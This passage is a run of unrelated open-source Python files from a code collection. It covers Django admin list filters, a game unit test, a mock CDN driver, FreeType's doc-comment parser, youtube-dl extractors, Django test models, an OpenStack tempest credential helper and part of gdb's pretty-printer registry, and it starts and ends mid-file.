        # Older Django exposes the relation via ``field.rel``; otherwise
        # fall back to the related model's primary key name.
        if hasattr(field, 'rel'):
            rel_name = field.rel.get_related_field().name
        else:
            rel_name = other_model._meta.pk.name
        self.lookup_formats = {'in': '%%s__%s__in' % rel_name,'exact': '%%s__%s__exact' %
                               rel_name, 'isnull': '%s__isnull'}
        self.lookup_choices = field.get_choices(include_blank=False)
        super(RelatedFieldListFilter, self).__init__(
            field, request, params, model, model_admin, field_path)
        if hasattr(field, 'verbose_name'):
            self.lookup_title = field.verbose_name
        else:
            self.lookup_title = other_model._meta.verbose_name
        self.title = self.lookup_title

    def has_output(self):
        # Nullable relations get an extra EMPTY choice; only show the
        # filter when there is more than one effective choice.
        if (is_related_field(self.field)
                and self.field.field.null or hasattr(self.field, 'rel')
                and self.field.null):
            extra = 1
        else:
            extra = 0
        return len(self.lookup_choices) + extra > 1

    def expected_parameters(self):
        # BUG FIX: the original returned [self.lookup_kwarg,
        # self.lookup_kwarg_isnull] -- attributes never defined in this
        # class hierarchy (they belong to django.contrib.admin's filter
        # API), so calling this raised AttributeError.  Return the
        # parameter names this filter actually registers.
        return [self.lookup_exact_name, self.lookup_isnull_name]

    def choices(self):
        yield {
            'selected': self.lookup_exact_val == '' and not self.lookup_isnull_val,
            'query_string': self.query_string({},
                                              [self.lookup_exact_name, self.lookup_isnull_name]),
            'display': _('All'),
        }
        for pk_val, val in self.lookup_choices:
            yield {
                'selected': self.lookup_exact_val == smart_text(pk_val),
                'query_string': self.query_string({
                    self.lookup_exact_name: pk_val,
                }, [self.lookup_isnull_name]),
                'display': val,
            }
        if (is_related_field(self.field)
                and self.field.field.null or hasattr(self.field, 'rel')
                and self.field.null):
            yield {
                'selected': bool(self.lookup_isnull_val),
                'query_string': self.query_string({
                    self.lookup_isnull_name: 'True',
                }, [self.lookup_exact_name]),
                'display': EMPTY_CHANGELIST_VALUE,
            }
@manager.register
class MultiSelectFieldListFilter(ListFieldFilter):
    """ Delegates the filter to the default filter and ors the results of each
    Lists the distinct values of each field as a checkbox
    Uses the default spec for each
    """
    template = 'xadmin/filters/checklist.html'
    lookup_formats = {'in': '%s__in'}
    # NOTE(review): this dict is a class attribute mutated via update() in
    # __init__, so per-instance cache_config leaks across instances --
    # confirm whether that sharing is intentional.
    cache_config = {'enabled':False,'key':'quickfilter_%s','timeout':3600,'cache':'default'}

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        return True

    def get_cached_choices(self):
        """Return the cached choice list, or None when caching is off/cold."""
        if not self.cache_config['enabled']:
            return None
        # BUG FIX: ``caches`` is Django's cache handler and must be indexed
        # (caches[alias]); calling it raised TypeError whenever caching
        # was enabled.
        c = caches[self.cache_config['cache']]
        return c.get(self.cache_config['key'] % self.field_path)

    def set_cached_choices(self, choices):
        """Store the choice list in the configured cache backend."""
        if not self.cache_config['enabled']:
            return
        c = caches[self.cache_config['cache']]
        # Pass the configured timeout (it was declared but never used).
        return c.set(self.cache_config['key'] % self.field_path, choices,
                     self.cache_config['timeout'])

    def __init__(self, field, request, params, model, model_admin, field_path,
                 field_order_by=None, field_limit=None, sort_key=None, cache_config=None):
        super(MultiSelectFieldListFilter, self).__init__(
            field, request, params, model, model_admin, field_path)

        # Check for the choice list in the cache first.
        if cache_config is not None and isinstance(cache_config, dict):
            self.cache_config.update(cache_config)

        if self.cache_config['enabled']:
            self.field_path = field_path
            choices = self.get_cached_choices()
            if choices:
                self.lookup_choices = choices
                return

        # Else rebuild it: distinct non-null values of the field.
        queryset = self.admin_view.queryset().exclude(
            **{"%s__isnull" % field_path: True}).values_list(field_path, flat=True).distinct()

        if field_order_by is not None:
            # Do a subquery to order the distinct set.
            queryset = self.admin_view.queryset().filter(id__in=queryset).order_by(field_order_by)

        if field_limit is not None and isinstance(field_limit, int) and queryset.count() > field_limit:
            queryset = queryset[:field_limit]

        self.lookup_choices = [str(it) for it in queryset.values_list(field_path, flat=True)
                               if str(it).strip() != ""]
        if sort_key is not None:
            self.lookup_choices = sorted(self.lookup_choices, key=sort_key)

        if self.cache_config['enabled']:
            self.set_cached_choices(self.lookup_choices)

    def choices(self):
        # Normalise the selected values into a list: the raw value may
        # already be a comma-split list, or a plain string ('' when unset).
        if not isinstance(self.lookup_in_val, (tuple, list)):
            self.lookup_in_val = list(self.lookup_in_val)
        yield {
            'selected': len(self.lookup_in_val) == 0,
            'query_string': self.query_string({}, [self.lookup_in_name]),
            'display': _('All'),
        }
        for val in self.lookup_choices:
            yield {
                'selected': smart_text(val) in self.lookup_in_val,
                'query_string': self.query_string({self.lookup_in_name: ",".join([val]+self.lookup_in_val),}),
                'remove_query_string': self.query_string({self.lookup_in_name: ",".join([v for v in self.lookup_in_val if v != val]),}),
                'display': val,
            }
@manager.register
class AllValuesFieldListFilter(ListFieldFilter):
    """Fallback filter listing every distinct value of the field."""
    lookup_formats = {'exact': '%s__exact', 'isnull': '%s__isnull'}

    @classmethod
    def test(cls, field, request, params, model, admin_view, field_path):
        # Registered last: accepts any field not claimed by earlier filters.
        return True

    def __init__(self, field, request, params, model, admin_view, field_path):
        parent_model, reverse_path = reverse_field_path(model, field_path)
        queryset = parent_model._default_manager.all()
        # optional feature: limit choices base on existing relationships
        # queryset = queryset.complex_filter(
        #    {'%s__isnull' % reverse_path: False})
        limit_choices_to = get_limit_choices_to_from_path(model, field_path)
        queryset = queryset.filter(limit_choices_to)

        # Lazy queryset of the distinct values, evaluated when iterated.
        self.lookup_choices = (queryset
                               .distinct()
                               .order_by(field.name)
                               .values_list(field.name, flat=True))
        super(AllValuesFieldListFilter, self).__init__(
            field, request, params, model, admin_view, field_path)

    def choices(self):
        # BUG FIX: the original compared with ``is ''`` -- identity of
        # string literals is an interning artefact, not a reliable
        # equality test; use ``==`` instead.
        yield {
            'selected': (self.lookup_exact_val == '' and self.lookup_isnull_val == ''),
            'query_string': self.query_string({}, [self.lookup_exact_name, self.lookup_isnull_name]),
            'display': _('All'),
        }
        include_none = False
        for val in self.lookup_choices:
            if val is None:
                # Render the None bucket last as the EMPTY choice.
                include_none = True
                continue
            val = smart_text(val)
            yield {
                'selected': self.lookup_exact_val == val,
                'query_string': self.query_string({self.lookup_exact_name: val},
                                                  [self.lookup_isnull_name]),
                'display': val,
            }
        if include_none:
            yield {
                'selected': bool(self.lookup_isnull_val),
                'query_string': self.query_string({self.lookup_isnull_name: 'True'},
                                                  [self.lookup_exact_name]),
                'display': EMPTY_CHANGELIST_VALUE,
            }
| gpl-3.0 |
itcropper/tanks | tests/game.py | 20 | 1881 | #!/usr/bin/env python
# Bzrflag
# Copyright 2008-2011 Brigham Young University
#
# This file is part of Bzrflag.
#
# Bzrflag is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# Bzrflag is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# Bzrflag. If not, see <http://www.gnu.org/licenses/>.
#
# Inquiries regarding any further use of Bzrflag, please contact the Copyright
# Licensing Office, Brigham Young University, 3760 HBLL, Provo, UT 84602,
# (801) 422-9339 or 422-3821, e-mail copyright@byu.edu.
"""Unit test for BZRFlag module game.py."""
__author__ = "BYU AML Lab <kseppi@byu.edu>"
__copyright__ = "Copyright 2008-2011 Brigham Young University"
__license__ = "GNU GPL"
import os
import unittest
from bzrflag import game, config
class GameTest(unittest.TestCase):
    """Smoke tests for bzrflag's game module using the bundled test map."""

    def setUp(self):
        base_dir = os.path.dirname(__file__)
        world_arg = "--world=" + os.path.join(base_dir, "..", "maps", "test.bzw")
        self.config = config.Config(['--test', world_arg])
        self.game_loop = game.GameLoop(self.config)
        # Advance the game once so state is populated before assertions.
        self.game_loop.update_game()
        self.team = "red"

    def tearDown(self):
        del self.game_loop

    def testInitialization(self):
        self.team = self.game_loop.game.teams['green']
        self.assertNotEqual(self.team._obstacles, [])
        self.assertEquals(len(list(self.game_loop.game.tanks())), 40)
        self.assertEquals(len(list(self.game_loop.game.shots())), 0)
# vim: et sw=4 sts=4
| gpl-3.0 |
tuxerman/cdn-old | cdn/provider/mock/driver.py | 1 | 1130 | # Copyright (c) 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""CDN Provider implementation."""
from cdn.common import decorators
from cdn.openstack.common import log as logging
from cdn import provider
from cdn.provider.mock import controllers
from oslo.config import cfg
LOG = logging.getLogger(__name__)
class CDNProvider(provider.CDNProviderBase):
    """Mock CDN provider used for testing; reports itself as always alive."""

    def __init__(self, conf):
        super(CDNProvider, self).__init__(conf)

    def is_alive(self):
        # The mock provider has no real backend to probe.
        return True

    @decorators.lazy_property(write=False)
    def service_controller(self):
        # Built lazily and cached (read-only) by the decorator.
        return controllers.ServiceController()
| apache-2.0 |
simonfork/aquaria | ExternalLibs/freetype2/src/tools/docmaker/sources.py | 367 | 10766 | # Sources (c) 2002, 2003, 2004, 2006, 2007, 2008, 2009
# David Turner <david@freetype.org>
#
#
# this file contains definitions of classes needed to decompose
# C sources files into a series of multi-line "blocks". There are
# two kinds of blocks:
#
# - normal blocks, which contain source code or ordinary comments
#
# - documentation blocks, which have restricted formatting, and
# whose text always start with a documentation markup tag like
# "<Function>", "<Type>", etc..
#
# the routines used to process the content of documentation blocks
# are not contained here, but in "content.py"
#
# the classes and methods found here only deal with text parsing
# and basic documentation block extraction
#
import fileinput, re, sys, os, string
################################################################
##
## BLOCK FORMAT PATTERN
##
## A simple class containing compiled regular expressions used
## to detect potential documentation format block comments within
## C source code
##
## note that the 'column' pattern must contain a group that will
## be used to "unbox" the content of documentation comment blocks
##
class SourceBlockFormat:
    """Holds the compiled regular expressions that recognize one style of
    documentation comment block (see the banner comment above)."""

    def __init__( self, id, start, column, end ):
        """compile the start/column/end patterns for one block format"""
        self.id = id
        # all three patterns are verbose-mode regexes
        for attr, pattern in ( ( "start", start ),
                               ( "column", column ),
                               ( "end", end ) ):
            setattr( self, attr, re.compile( pattern, re.VERBOSE ) )
#
# format 1 documentation comment blocks look like the following:
#
# /************************************/
# /* */
# /* */
# /* */
# /************************************/
#
# we define a few regular expressions here to detect them
#
start = r'''
\s* # any number of whitespace
/\*{2,}/ # followed by '/' and at least two asterisks then '/'
\s*$ # probably followed by whitespace
'''
column = r'''
\s* # any number of whitespace
/\*{1} # followed by '/' and precisely one asterisk
([^*].*) # followed by anything (group 1)
\*{1}/ # followed by one asterisk and a '/'
\s*$ # probably followed by whitespace
'''
re_source_block_format1 = SourceBlockFormat( 1, start, column, start )
#
# format 2 documentation comment blocks look like the following:
#
# /************************************ (at least 2 asterisks)
# *
# *
# *
# *
# **/ (1 or more asterisks at the end)
#
# we define a few regular expressions here to detect them
#
start = r'''
\s* # any number of whitespace
/\*{2,} # followed by '/' and at least two asterisks
\s*$ # probably followed by whitespace
'''
column = r'''
\s* # any number of whitespace
\*{1}(?!/) # followed by precisely one asterisk not followed by `/'
(.*) # then anything (group1)
'''
end = r'''
\s* # any number of whitespace
\*+/ # followed by at least one asterisk, then '/'
'''
re_source_block_format2 = SourceBlockFormat( 2, start, column, end )
#
# the list of supported documentation block formats, we could add new ones
# relatively easily
#
re_source_block_formats = [re_source_block_format1, re_source_block_format2]
#
# the following regular expressions corresponds to markup tags
# within the documentation comment blocks. they're equivalent
# despite their different syntax
#
# notice how each markup tag _must_ begin a new line
#
re_markup_tag1 = re.compile( r'''\s*<(\w*)>''' ) # <xxxx> format
re_markup_tag2 = re.compile( r'''\s*@(\w*):''' ) # @xxxx: format
#
# the list of supported markup tags, we could add new ones relatively
# easily
#
re_markup_tags = [re_markup_tag1, re_markup_tag2]
#
# used to detect a cross-reference, after markup tags have been stripped
#
re_crossref = re.compile( r'@(\w*)(.*)' )
#
# used to detect italic and bold styles in paragraph text
#
re_italic = re.compile( r"_(\w(\w|')*)_(.*)" ) # _italic_
re_bold = re.compile( r"\*(\w(\w|')*)\*(.*)" ) # *bold*
#
# used to detect the end of commented source lines
#
re_source_sep = re.compile( r'\s*/\*\s*\*/' )
#
# used to perform cross-reference within source output
#
re_source_crossref = re.compile( r'(\W*)(\w*)' )
#
# a list of reserved source keywords
#
re_source_keywords = re.compile( '''\\b ( typedef |
struct |
enum |
union |
const |
char |
int |
short |
long |
void |
signed |
unsigned |
\#include |
\#define |
\#undef |
\#if |
\#ifdef |
\#ifndef |
\#else |
\#endif ) \\b''', re.VERBOSE )
################################################################
##
## SOURCE BLOCK CLASS
##
## A SourceProcessor is in charge of reading a C source file
## and decomposing it into a series of different "SourceBlocks".
## each one of these blocks can be made of the following data:
##
## - A documentation comment block that starts with "/**" and
## whose exact format will be discussed later
##
## - normal sources lines, including comments
##
## the important fields in a text block are the following ones:
##
## self.lines : a list of text lines for the corresponding block
##
## self.content : for documentation comment blocks only, this is the
## block content that has been "unboxed" from its
## decoration. This is None for all other blocks
## (i.e. sources or ordinary comments with no starting
## markup tag)
##
class SourceBlock:
    # One decomposed chunk of a C source file: either ordinary source
    # lines, or a documentation comment block (self.content non-empty).
    # NOTE: this file is Python 2 (print statements, string module).

    def __init__( self, processor, filename, lineno, lines ):
        self.processor = processor
        self.filename = filename
        self.lineno = lineno
        self.lines = lines[:]
        # the format the processor was in when this block was captured;
        # None means plain source lines
        self.format = processor.format
        self.content = []

        if self.format == None:
            return

        # NOTE(review): 'words' is assigned but never used -- candidate
        # for removal.
        words = []

        # extract comment lines
        lines = []

        for line0 in self.lines:
            m = self.format.column.match( line0 )
            if m:
                lines.append( m.group( 1 ) )

        # now, look for a markup tag; only blocks that contain at least
        # one tag (e.g. "<Function>" or "@Function:") keep their content
        for l in lines:
            l = string.strip( l )
            if len( l ) > 0:
                for tag in re_markup_tags:
                    if tag.match( l ):
                        self.content = lines
                        return

    def location( self ):
        # "(filename:lineno)" string for diagnostics
        return "(" + self.filename + ":" + repr( self.lineno ) + ")"

    # debugging only - not used in normal operations
    def dump( self ):
        if self.content:
            print "{{{content start---"
            for l in self.content:
                print l
            print "---content end}}}"
            return

        fmt = ""
        if self.format:
            fmt = repr( self.format.id ) + " "

        for line in self.lines:
            print line
################################################################
##
## SOURCE PROCESSOR CLASS
##
## The SourceProcessor is in charge of reading a C source file
## and decomposing it into a series of different "SourceBlock"
## objects.
##
## each one of these blocks can be made of the following data:
##
## - A documentation comment block that starts with "/**" and
## whose exact format will be discussed later
##
## - normal sources lines, include comments
##
##
class SourceProcessor:
    # Splits a C source file into a list of SourceBlock objects, driven
    # by the block-format patterns in re_source_block_formats.
    # NOTE: Python 2 code (relies on the global fileinput state).

    def __init__( self ):
        """initialize a source processor"""
        self.blocks = []
        self.filename = None
        # the SourceBlockFormat currently being parsed, or None when
        # reading ordinary source lines
        self.format = None
        self.lines = []

    def reset( self ):
        """reset a block processor, clean all its blocks"""
        self.blocks = []
        self.format = None

    def parse_file( self, filename ):
        """parse a C source file, and add its blocks to the processor's list"""
        self.reset()
        self.filename = filename

        # close any previous fileinput stream (fileinput is module-global)
        fileinput.close()
        self.format = None
        self.lineno = 0
        self.lines = []

        for line in fileinput.input( filename ):
            # strip trailing newlines, important on Windows machines!
            if line[-1] == '\012':
                line = line[0:-1]

            if self.format == None:
                self.process_normal_line( line )
            else:
                if self.format.end.match( line ):
                    # that's a normal block end, add it to 'lines' and
                    # create a new block
                    self.lines.append( line )
                    self.add_block_lines()
                elif self.format.column.match( line ):
                    # that's a normal column line, add it to 'lines'
                    self.lines.append( line )
                else:
                    # humm.. this is an unexpected block end,
                    # create a new block, but don't process the line
                    self.add_block_lines()

                    # we need to process the line again
                    self.process_normal_line( line )

        # record the last lines
        self.add_block_lines()

    def process_normal_line( self, line ):
        """process a normal line and check whether it is the start of a new block"""
        # a line matching a block-start pattern flushes the current block
        # and switches the processor into that format
        for f in re_source_block_formats:
            if f.start.match( line ):
                self.add_block_lines()
                self.format = f
                self.lineno = fileinput.filelineno()

        self.lines.append( line )

    def add_block_lines( self ):
        """add the current accumulated lines and create a new block"""
        if self.lines != []:
            block = SourceBlock( self, self.filename, self.lineno, self.lines )

            self.blocks.append( block )
            self.format = None
            self.lines = []

    # debugging only, not used in normal operations
    def dump( self ):
        """print all blocks in a processor"""
        for b in self.blocks:
            b.dump()
# eof
| gpl-2.0 |
jomo/youtube-dl | youtube_dl/extractor/thvideo.py | 151 | 3033 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
unified_strdate
)
class THVideoIE(InfoExtractor):
    # Extractor for single videos on thvideo.tv; matches both the desktop
    # (/v/thNNN) and mobile (mobile.php?cid=NNN) URL forms.
    _VALID_URL = r'http://(?:www\.)?thvideo\.tv/(?:v/th|mobile\.php\?cid=)(?P<id>[0-9]+)'
    _TEST = {
        'url': 'http://thvideo.tv/v/th1987/',
        'md5': 'fa107b1f73817e325e9433505a70db50',
        'info_dict': {
            'id': '1987',
            'ext': 'mp4',
            'title': '【动画】秘封活动记录 ~ The Sealed Esoteric History.分镜稿预览',
            'display_id': 'th1987',
            'thumbnail': 'http://thvideo.tv/uploadfile/2014/0722/20140722013459856.jpg',
            'description': '社团京都幻想剧团的第一个东方二次同人动画作品「秘封活动记录 ~ The Sealed Esoteric History.」 本视频是该动画第一期的分镜草稿...',
            'upload_date': '20140722'
        }
    }

    def _real_extract(self, url):
        video_id = self._match_id(url)

        # extract download link from mobile player page
        # (the "-0" suffix presumably selects the first part -- TODO confirm)
        webpage_player = self._download_webpage(
            'http://thvideo.tv/mobile.php?cid=%s-0' % (video_id),
            video_id, note='Downloading video source page')
        video_url = self._html_search_regex(
            r'<source src="(.*?)" type', webpage_player, 'video url')

        # extract video info from main page
        webpage = self._download_webpage(
            'http://thvideo.tv/v/th%s' % (video_id), video_id)
        title = self._og_search_title(webpage)
        display_id = 'th%s' % video_id
        thumbnail = self._og_search_thumbnail(webpage)
        description = self._og_search_description(webpage)
        upload_date = unified_strdate(self._html_search_regex(
            r'span itemprop="datePublished" content="(.*?)">', webpage,
            'upload date', fatal=False))

        return {
            'id': video_id,
            'ext': 'mp4',
            'url': video_url,
            'title': title,
            'display_id': display_id,
            'thumbnail': thumbnail,
            'description': description,
            'upload_date': upload_date
        }
class THVideoPlaylistIE(InfoExtractor):
    """Extractor for thvideo.tv "mylist" playlist pages.

    Collects every video linked from the playlist page and delegates each
    entry to THVideoIE.
    """
    # BUG FIX: the original pattern was r'http?://...', which matches the
    # malformed scheme "htt://" and never matches "https://".  Use the
    # conventional optional-s form.
    _VALID_URL = r'https?://(?:www\.)?thvideo\.tv/mylist(?P<id>[0-9]+)'
    _TEST = {
        'url': 'http://thvideo.tv/mylist2',
        'info_dict': {
            'id': '2',
            'title': '幻想万華鏡',
        },
        'playlist_mincount': 23,
    }

    def _real_extract(self, url):
        playlist_id = self._match_id(url)
        webpage = self._download_webpage(url, playlist_id)
        list_title = self._html_search_regex(
            r'<h1 class="show_title">(.*?)<b id', webpage, 'playlist title',
            fatal=False)

        # One entry per linked video id (renamed from ``id`` to avoid
        # shadowing the builtin).
        entries = [
            self.url_result('http://thvideo.tv/v/th' + video_id, 'THVideo')
            for video_id in re.findall(
                r'<dd><a href="http://thvideo.tv/v/th(\d+)/" target=', webpage)]

        return self.playlist_result(entries, playlist_id, list_title)
| unlicense |
lzw120/django | tests/modeltests/custom_pk/models.py | 34 | 1122 | # -*- coding: utf-8 -*-
"""
14. Using a custom primary key
By default, Django adds an ``"id"`` field to each model. But you can override
this behavior by explicitly adding ``primary_key=True`` to a field.
"""
from __future__ import absolute_import
from django.db import models
from .fields import MyAutoField
class Employee(models.Model):
    # Explicit integer primary key stored in the legacy 'code' column.
    employee_code = models.IntegerField(primary_key=True, db_column = 'code')
    first_name = models.CharField(max_length=20)
    last_name = models.CharField(max_length=20)

    class Meta:
        ordering = ('last_name', 'first_name')

    def __unicode__(self):
        # Python 2 string representation: "First Last".
        return u"%s %s" % (self.first_name, self.last_name)
class Business(models.Model):
    # Natural-key model: the name itself is the primary key.
    name = models.CharField(max_length=20, primary_key=True)
    employees = models.ManyToManyField(Employee)

    class Meta:
        # Override the default "businesss" pluralization.
        verbose_name_plural = 'businesses'

    def __unicode__(self):
        return self.name
class Bar(models.Model):
    # Exercises a custom AutoField subclass as the primary key.
    id = MyAutoField(primary_key=True, db_index=True)

    def __unicode__(self):
        return repr(self.pk)
class Foo(models.Model):
    # Foreign key to a model with a custom-typed primary key.
    bar = models.ForeignKey(Bar)
| bsd-3-clause |
pnavarro/neutron | neutron/tests/tempest/common/cred_provider.py | 47 | 4598 | # Copyright (c) 2014 Deutsche Telekom AG
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from oslo_log import log as logging
import six
from neutron.tests.tempest import auth
from neutron.tests.tempest import config
from neutron.tests.tempest import exceptions
CONF = config.CONF
LOG = logging.getLogger(__name__)
# Type of credentials available from configuration
# Maps credential type name -> (config section, option prefix).
CREDENTIAL_TYPES = {
    'identity_admin': ('identity', 'admin'),
    'user': ('identity', None),
    'alt_user': ('identity', 'alt')
}
# Transport/SSL options shared by every Credentials object built here.
DEFAULT_PARAMS = {
    'disable_ssl_certificate_validation':
        CONF.identity.disable_ssl_certificate_validation,
    'ca_certs': CONF.identity.ca_certificates_file,
    'trace_requests': CONF.debug.trace_requests
}
# Reads credentials from the configuration and builds a Credentials object
# based on the specified (or configured) identity version
def get_configured_credentials(credential_type, fill_in=True,
                               identity_version=None):
    """Build a Credentials object from the static configuration.

    :param credential_type: one of the keys of CREDENTIAL_TYPES
    :param fill_in: forwarded to get_credentials
    :param identity_version: 'v2' or 'v3'; defaults to the configured value
    :raises InvalidConfiguration: unsupported version or invalid settings
    :raises InvalidCredentials: unknown credential_type
    """
    version = identity_version or CONF.identity.auth_version
    if version not in ('v2', 'v3'):
        raise exceptions.InvalidConfiguration(
            'Unsupported auth version: %s' % version)
    if credential_type not in CREDENTIAL_TYPES:
        raise exceptions.InvalidCredentials()

    conf_attributes = ['username', 'password', 'tenant_name']
    if version == 'v3':
        conf_attributes.append('domain_name')

    # Pull each credential attribute out of the relevant config section,
    # honouring the per-type option prefix when one is defined.
    params = DEFAULT_PARAMS.copy()
    section, prefix = CREDENTIAL_TYPES[credential_type]
    conf_section = getattr(CONF, section)
    for attr in conf_attributes:
        option = attr if prefix is None else prefix + "_" + attr
        params[attr] = getattr(conf_section, option)

    # Build and validate credentials. We are reading configured credentials,
    # so validate them even if fill_in is False.
    credentials = get_credentials(fill_in=fill_in, **params)
    if not fill_in and not credentials.is_valid():
        msg = ("The %s credentials are incorrectly set in the config file."
               " Double check that all required values are assigned" %
               credential_type)
        raise exceptions.InvalidConfiguration(msg)
    return credentials
# Wrapper around auth.get_credentials to use the configured identity version
# if none is specified
def get_credentials(fill_in=True, identity_version=None, **kwargs):
    """Wrapper around auth.get_credentials using the configured identity
    version when none is specified.

    :param fill_in: forwarded to auth.get_credentials
    :param identity_version: 'v2' or 'v3'; defaults to the configured value
    :param kwargs: credential attributes (username, password, ...)
    """
    params = dict(DEFAULT_PARAMS, **kwargs)
    identity_version = identity_version or CONF.identity.auth_version
    # In case of "v3" add the domain from config if not specified
    if identity_version == 'v3':
        domain_fields = set(x for x in auth.KeystoneV3Credentials.ATTRIBUTES
                            if 'domain' in x)
        if not domain_fields.intersection(kwargs.keys()):
            # Bug fix: the default domain must be written into `params`
            # (which is what is actually passed on below); the old code
            # assigned into `kwargs`, which is never read again, so the
            # configured domain silently never reached auth.get_credentials.
            params['user_domain_name'] = CONF.identity.admin_domain_name
        auth_url = CONF.identity.uri_v3
    else:
        auth_url = CONF.identity.uri
    return auth.get_credentials(auth_url,
                                fill_in=fill_in,
                                identity_version=identity_version,
                                **params)
@six.add_metaclass(abc.ABCMeta)
class CredentialProvider(object):
    """Abstract interface for objects that hand out test credentials.

    NOTE(review): ``password`` and ``network_resources`` are accepted but
    not stored here; presumably concrete subclasses use them — confirm
    against the implementations before relying on either.
    """
    def __init__(self, name, password='pass', network_resources=None):
        # Only the provider name is kept on the base class.
        self.name = name
    @abc.abstractmethod
    def get_primary_creds(self):
        return
    @abc.abstractmethod
    def get_admin_creds(self):
        return
    @abc.abstractmethod
    def get_alt_creds(self):
        return
    @abc.abstractmethod
    def clear_isolated_creds(self):
        return
    @abc.abstractmethod
    def is_multi_user(self):
        return
    @abc.abstractmethod
    def is_multi_tenant(self):
        return
    @abc.abstractmethod
    def get_creds_by_roles(self, roles, force_new=False):
        return
    @abc.abstractmethod
    def is_role_available(self, role):
        return
| apache-2.0 |
mrjaydee82/SinLessKernel-4.4.4 | toolchains/491/share/gdb/python/gdb/printing.py | 75 | 10191 | # Pretty-printer utilities.
# Copyright (C) 2010-2014 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Utilities for working with pretty-printers."""
import gdb
import gdb.types
import re
import sys
# Compatibility aliases so the rest of this module runs unchanged on
# both Python 2 and Python 3.
if sys.version_info[0] > 2:
    # Python 3 removed basestring and long
    basestring = str
    long = int
class PrettyPrinter(object):
    """A basic pretty-printer.

    Attributes:
        name: A string, unique among all printers registered in the same
            context (objfile, progspace, or global(gdb)); it should describe
            what the printer handles, e.g. "StringPiece" or "protobufs".
        subprinters: An iterable whose elements each carry a `name'
            attribute and, potentially, an "enabled" attribute; None when
            the printer has no subprinters.
        enabled: A boolean indicating if the printer is enabled.

    Subprinters exist for the case where "one" pretty-printer is really a
    collection of printers, e.g. the libstdc++ printer, which dispatches to
    one printer per type based on regexps.
    """

    # Subprinter support could live in a subclass, but keeping it here
    # formalizes it and simplifies commands/pretty_printers.py.
    def __init__(self, name, subprinters=None):
        self.enabled = True
        self.subprinters = subprinters
        self.name = name

    def __call__(self, val):
        # Subclasses must override this.
        raise NotImplementedError("PrettyPrinter __call__")
class SubPrettyPrinter(object):
    """Base class for sub-pretty-printers.

    Sub-pretty-printers are not required to derive from this, but it
    formalizes the expected interface.

    Attributes:
        name: The name of the subprinter.
        enabled: A boolean indicating if the subprinter is enabled.
    """

    def __init__(self, name):
        self.enabled = True
        self.name = name
def register_pretty_printer(obj, printer, replace=False):
    """Register pretty-printer PRINTER with OBJ.

    The printer is added to the front of the search list, thus one can override
    an existing printer if one needs to.  Use a different name when overriding
    an existing printer, otherwise an exception will be raised; multiple
    printers with the same name are disallowed.

    Arguments:
        obj: Either an objfile, progspace, or None (in which case the printer
            is registered globally).
        printer: Either a function of one argument (old way) or any object
            which has attributes: name, enabled, __call__.
        replace: If True replace any existing copy of the printer.
            Otherwise if the printer already exists raise an exception.

    Returns:
        Nothing.

    Raises:
        TypeError: A problem with the type of the printer.
        ValueError: The printer's name contains a semicolon ";".
        RuntimeError: A printer with the same name is already registered.

    If the caller wants the printer to be listable and disableable, it must
    follow the PrettyPrinter API.  This applies to the old way (functions) too.
    If printer is an object, __call__ is a method of two arguments:
    self, and the value to be pretty-printed.  See PrettyPrinter.
    """
    # Watch for both __name__ and name.
    # Functions get the former for free, but we don't want to use an
    # attribute named __foo__ for pretty-printers-as-objects.
    # If printer has both, we use `name'.
    if not hasattr(printer, "__name__") and not hasattr(printer, "name"):
        raise TypeError("printer missing attribute: name")
    if hasattr(printer, "name") and not hasattr(printer, "enabled"):
        raise TypeError("printer missing attribute: enabled")
    if not hasattr(printer, "__call__"):
        raise TypeError("printer missing attribute: __call__")

    # Bug fix: a display name must be computed before the verbose messages
    # below.  The old code referenced an undefined local `name` in the
    # global-registration branch (NameError when `verbose` was on) and
    # unconditionally used printer.name in the other branch, which functions
    # (having only __name__) do not provide.  One of the two attributes is
    # guaranteed to exist by the checks above.
    name = getattr(printer, "name", getattr(printer, "__name__", None))

    if obj is None:
        if gdb.parameter("verbose"):
            gdb.write("Registering global %s pretty-printer ...\n" % name)
        obj = gdb
    else:
        if gdb.parameter("verbose"):
            gdb.write("Registering %s pretty-printer for %s ...\n" %
                      (name, obj.filename))

    if hasattr(printer, "name"):
        if not isinstance(printer.name, basestring):
            raise TypeError("printer name is not a string")
        # If printer provides a name, make sure it doesn't contain ";".
        # Semicolon is used by the info/enable/disable pretty-printer commands
        # to delimit subprinters.
        if printer.name.find(";") >= 0:
            raise ValueError("semicolon ';' in printer name")
        # Also make sure the name is unique.
        # Alas, we can't do the same for functions and __name__, they could
        # all have a canonical name like "lookup_function".
        # PERF: gdb records printers in a list, making this inefficient.
        i = 0
        for p in obj.pretty_printers:
            if hasattr(p, "name") and p.name == printer.name:
                if replace:
                    del obj.pretty_printers[i]
                    break
                else:
